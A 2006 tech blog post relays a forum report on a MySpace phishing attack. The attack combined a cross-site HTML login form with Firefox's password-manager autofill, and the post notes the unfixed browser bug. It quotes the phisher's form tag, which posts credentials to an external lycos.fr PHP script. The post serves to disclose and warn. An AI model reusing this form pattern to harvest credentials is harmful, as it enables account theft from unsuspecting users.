Monday November 27, 2006 
Monday November 27, 2006
Cross-Site Forms + Password Manager = Security Failure
forums.mozillazine.org, forums.mozillazine.org -> bugzilla.mozilla.org :
I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!
The underlying method was so obvious that it should have raised multiple warnings. There were none at all.
It was in a MySpace profile that included this tag:
<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">
What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.
Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...
- As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.
Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code. And for you to have a saved password on that site.
2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.
Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page.
(2006-11-27 16:44:53 SGT)
[Tech]
Permalink
Comments:
Post a Comment:
Comments are closed for this entry.
Most popular blog postings on lowem.log :
1. Singapore MRT rail network length to double by 2020
2. 2010 Nissan Leaf electric car specifications : 107hp, 24KWh lithium-ion batteries, 100-mile range
3. Live spot gold price quotes chart on COMEX
4. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
5. AVG Anti-Virus Free Edition 2011 direct download link
6. Real-time live gold and silver price quotes chart on COMEX
7. Singapore electric vehicles : Government agencies EMA and LTA to study EV introduction
8. Book review : Shut Down by William Flynn
Featured articles on lowem.log :
1. Book review : Shut Down by William Flynn
2. Singapore electric cars testing starts with 9 electric vehicles
3. Honda, GS Yuasa JV to make lithium-ion batteries for 2010/2011 Honda Civic Hybrid
4. 2010 Honda Civic Hybrid preliminary specifications released
5. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
6. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
7. NYMEX crude oil recovers from $32.40 low after 2.2 mbpd OPEC production cut announced
8. Singapore : Nuclear power not ruled out
| search |
|
|
| sponsored links |
|
|
| bookmarks |
|
about
blogroll
sites
quotes
charts
historical |
| navigation |
| decals |
|
| powered by |
|
| hosted by |
|